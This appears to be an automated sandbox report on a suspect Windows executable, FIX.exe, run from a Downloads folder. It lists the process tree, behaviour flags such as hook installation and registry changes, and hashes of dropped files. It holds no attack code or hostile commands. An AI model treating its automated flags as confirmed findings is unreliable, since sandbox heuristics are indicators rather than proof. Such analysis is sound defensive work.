C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4812 /prefetch:22⤵PID:1352
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3836
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3564
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3404
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4560
-
C:\Users\Admin\Downloads\FIX.exe"C:\Users\Admin\Downloads\FIX.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
C:\Users\Admin\Downloads\FIX.exe"C:\Users\Admin\Downloads\FIX.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5204
-
C:\Users\Admin\Downloads\FIX.exe"C:\Users\Admin\Downloads\FIX.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD511c6e74f0561678d2cf7fc075a6cc00c
SHA1535ee79ba978554abcb98c566235805e7ea18490
SHA256d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63
SHA51232c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
152B
MD5254fc2a9d1a15f391d493bff79f66f08
SHA16165d5a9de512bb33a82d99d141a2562aa1aabfb
SHA2562bf9282b87bdef746d298cff0734b9a82cd9c24656cb167b24a84c30fb6a1fd0
SHA512484a1c99ee3c3d1ebf0af5ec9e73c9a2ca3cf8918f0ba2a4b543b75fa587ec6b432866b74bcd6b5cdd9372532c882da438d44653bd5bccdbc94ebc27852ff9e2
-
Filesize
152B
MD55408de1548eb3231accfb9f086f2b9db
SHA1f2d8c7e9f3e26cd49ee0a7a4fecd70b2bf2b7e8a
SHA2563052d0885e0ef0d71562958b851db519cfed36fd8e667b57a65374ee1a13a670
SHA512783254d067de3ac40df618665be7f76a6a8acb7e63b875bffc3c0c73b68d138c8a98c437e6267a1eb33f04be976a14b081a528598b1e517cdd9ad2293501acc8
-
Filesize
73KB
MD506d4574bbdb9fc46e8b45b2cc2b49353
SHA12807ebdd31975b92528b483f9ad8a515a8c8d3ed
SHA2561076c142098245872c8f432088728153688b87ebc63aaec9ae782da445adc4c3
SHA5129ad28f7d377b2220cf1f339a86d242df346b217da58b5d7c94fc03037e6c334a0cc0bbfd5145ab12a4fa534421c484f11c61529418c3a8bbfdcd951d6cc2115b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize48B
MD59792c0a35d061d04cb696fb8660ded5a
SHA1d795e255d25339201d6dccb178af92830e5d0158
SHA256c47d96cb2a6057bc6c4d0072ec0e7a98e5f43a88fa267e1f64c758df6dd3d22a
SHA512f09b00b450b2759a60131625cca76f1a9e457334b4c50f0bd65e0e1f5313979fd855eda2a26d1a2b1162e794717cff5f8ff8b6d57b63f366a3f9056cd3067a61
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD59fdc9949b8d3829cc395741190e4b3d3
SHA110af414a4d3f2fbf27fc768260416f3809b3af96
SHA256d431a385802b3b4f1a0b25f3678dcf4845d9790772285fdf8f176bfc3f8dd974
SHA5126035ce10dd9402b8c1f768952fe0bb61c9e0209a6605d9189d1761cbe54ef115dd23d8f4127d7bd57aeb0ffc1dcd9a8bfe15f49f06697693e66a631f35b68d54
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
59B
MD52800881c775077e1c4b6e06bf4676de4
SHA12873631068c8b3b9495638c865915be822442c8b
SHA256226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b
-
Filesize
391B
MD57c0d79b95ae2cf3dfd2a4054af266439
SHA1c632524bc5141e51619f1bbab0149e8c9ad7660e
SHA256482f5001679264f5a3f2a293accc44b07e092ea861755a66428fadcb0ff43d6d
SHA512e2f8cf3582f48b0886ae7299646b1029f36c0e081fad45445b4a99f04b5993106fe7a0288842c50eb4ee10ad2dd32c98a848849b52e190c869144d5701804411
-
Filesize
6KB
MD5b64ede6315fb713b3f371aac1d7c0baa
SHA11f4ec60125cc8c8c615a43fc98abb9974c81f243
SHA2561f0df81e668ac75dbdc5b14714c8f57741445de89d2ed5f2e26714525544f694
SHA5124579d3a21ca290a06f022834c0c91c576c1e4e0328aa3febb69837b815ea2cae749dbd7b67c5b3e09131eea33186aff055225c0a9b2aa45b1a96102b3ddeabe8
-
Filesize
5KB
MD5c63295fb1170df544d81fc0df4272f7d
SHA1d685add26ca07f6ba559e6ba7212814d9707eb58
SHA256426835f5e79851d3ece3860502911dfa0bcccdae6d1beb1d058dea0ab0c9882d
SHA51208cc6578858a905b5033e933b82dd13e915cbe39cd69bdb33c274ef9a433c7e48ea807dc5ea02601d6fdc8ac0236ad1e67ff7ec680240eecf81ea2fcbab6d755
-
Filesize
5KB
MD5be589e592104c8d144bc70cbc6d12dbb
SHA128c99958ea7f5e82d187335309c0e52cee000536
SHA256b8233f59d5262e48d2d2282c0e0a2cad8761b828116f52938abeebaae781e8f4
SHA512e0cbe0989599365a1ff5f62bda197eab8eeaa6c8b1fa7483e790a0f600349e47c85a6bcd92564c46c6ca21baf7ec3baad6ff1da045fdc011f681832fa0a32f95
-
Filesize
6KB
MD5d3d4d3936bf9b32b30b64fa47d3e6f17
SHA1a5647249c4922085b5c3a99684712094b8369336
SHA2569f6d01787a1c4a53e85b91186a256d91f17d88436ea4f84af638655e76c76864
SHA51217587664715ee660eec649741808cb3a6185a4d6fbd2e16f0bcc88984aa05c7d41a1ac191ac5da4c3cab699d88c12806d10d2f3c6f3fa230eba11c1b6dc87db2
-
Filesize
6KB
MD566569c1834c8f5f7a158ba19d649a43f
SHA1baf74a5d78b86324991328bea4f5d9dabf51e4ab
SHA25655f465685f0b4b6692739d8a810173220c6a386ea8bc5404bc691ac4cecffc97
SHA512dc33bb53d6990924e01ef6db7f8c14009516a6ff55092969cd527506f486734f9c6eeb2fe456b8e16ef9e59f941e91caad589d6256b96b2b5215873a1a9c6e61
-
Filesize
24KB
MD548febe0b0625901956573dfb2378e7ed
SHA1c324173a8f8fd7a6a7398f6bb24dd2ee11d3cf24
SHA256f0fae7ad33efdd05845d0d631ce8341ea4b6dfd4c45be844f0c117738df9c0d0
SHA512fc38a0c64e67e3b5d43f787fe86f700e6f753d8e90bcebc446d4a8c631b9e4362a74fa862a5b2ffc74f3f5236d3ecf006b341042b5469d1cc24f2c325a607a91
-
Filesize
24KB
MD5bc3a0ca62cfef580ff9ebbb7afc92b9b
SHA1fde9832ce521fcd53850d0701a543ef75b772e3b
SHA256b0203fb7c3812937e92ac04ad6065a2129bc165a36a60a4d2fdb0accc4499464
SHA512fc1f3a5bd2106d9b6ed5a678c2f4978550a0d7414172b0ce6954a835b0da01ac28c177955a48c2ef56ea3d517a6672474a9cab873aeccae3f22a45ccf2d070de
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
11KB
MD583bf0051f2f8b19f983a49e033d732bd
SHA1b88824e55e8d7b7af605d5f5c8eed03afc3e90d6
SHA25650ae9719f9813b33358f19c97be4703fc3356171d06044154e0a4cac789c24dc
SHA51227834c3d4ce931739daba28ce444475363d65eacd74092bf2d0269cdf697ff71af1d07ab0396916f312981707978a5d02f34d962d43db454ea90f31220f81d94
-
Filesize
10KB
MD5239a02dce005e18ca317b4ade69e897b
SHA112b2f0772fdee56fd782907a396422492c542789
SHA2569841278bdd6e525fa2639392c7769a82677c3103401479c2e6e4513492ecbf86
SHA512a4f9564adaf271e3dbcf8757887540f5138db6ff0642bffd12db9cd6cb9e311620b2ef68c66be7fdcc65fa0589691b8397efdefd537c9e02611ba04bf5cc6287
-
Filesize
8KB
MD53142bf320a31806fd31f6d043ee4784c
SHA17370c22d22b364fd4a09630e4919e668a53bbb33
SHA2562c0d748f4af6f372b57505865f93a878ef21844d15f47f205e3be763b100ebab
SHA512d6010098a1b0603130d076507f2f2471593067a98e73ed559eec7d69535424abb2bd0800671a284299812f61e3b65a84f24e2e6bd0ff1c4d11d3823b5a12c773
-
Filesize
10KB
MD5bdf31304ed654a246adc3c169868b6bf
SHA1a68c98da5c0d8886f56fecba81f5875469ed2142
SHA256ab91a7c2299d2dae673bffd68bba4a1f9aa27fef81573e29bdd0d5d738d5fc6a
SHA5121e3d1deb48e5b2696eb27fedbacc75312f1cf0187cb2c2a7518f10d71c66f41cd6f973ac48ae7074587f572f6c26bda3ea3e1f43066a5ee424d10d52e7344042
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
1KB
MD5ee837f9246bf7d67b3132d8c32031517
SHA1044171961c32e56e9e41da106ca654d1d7a5198f
SHA256bf2368988696a019042e21b490d30f66297c8517a9fd3ca798fac7183d2b2d28
SHA512cd8636c9fcdf8eb25cde91309edf5a01cba0b155d81f4a176c0bb7e0b829cc0b7adea724d6d27778beaf1247bafdddc9c47d05388c23da26a21e8c436d47d4a5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16.4MB
MD5ee2397b5f70e81dd97a4076ba1cb1d3a
SHA18350f648ebd269b4bca720b4143dd3edcdfafa8f
SHA256b5b1454e2e3a66edf3bde92b29a4f4b324fa3c3d88dc28e378c22cb42237cc67
SHA51257fc76393881c504ac4c37a8ea812a7e21f2bed4ffa4de42a2e6e4558a78bba679ec0f8fcdc39798306c3a97e424fb875680b7f78ac07be3f7f58df093575562
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5eee8e4f53030900a14987f399169ca66
SHA16c4e1fe8916e04da4e2252cf30365fb45cc7d290
SHA2561de84f280a51dc1329d21185df5f5931cfd8c99dc11871d43ade834255d73e8c
SHA5127db1a19cc5c9004d76cd1883348716665d77ac7d1c1ae2cc14a2b45c6d9b811682d10b534bc4fae4edfe848dc29b748d63687c0de2fa3d0a8c25699ab743c0eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD58d7970ab83de0a2005124e7983295d74
SHA19457b6c5ff03ab3ea934132687e8b6613f8c5f40
SHA2566e8f66bf3274815bf0c001084fc7547572213e0010a29a12ae92622818a12164
SHA512d7817ebab3cd7890e26e4da05737616bb767007b829d3a89172453d8072fb5333d634a18d7c19dc21c0779af7c097d517059de2ed59575064d04e1462e0ed6af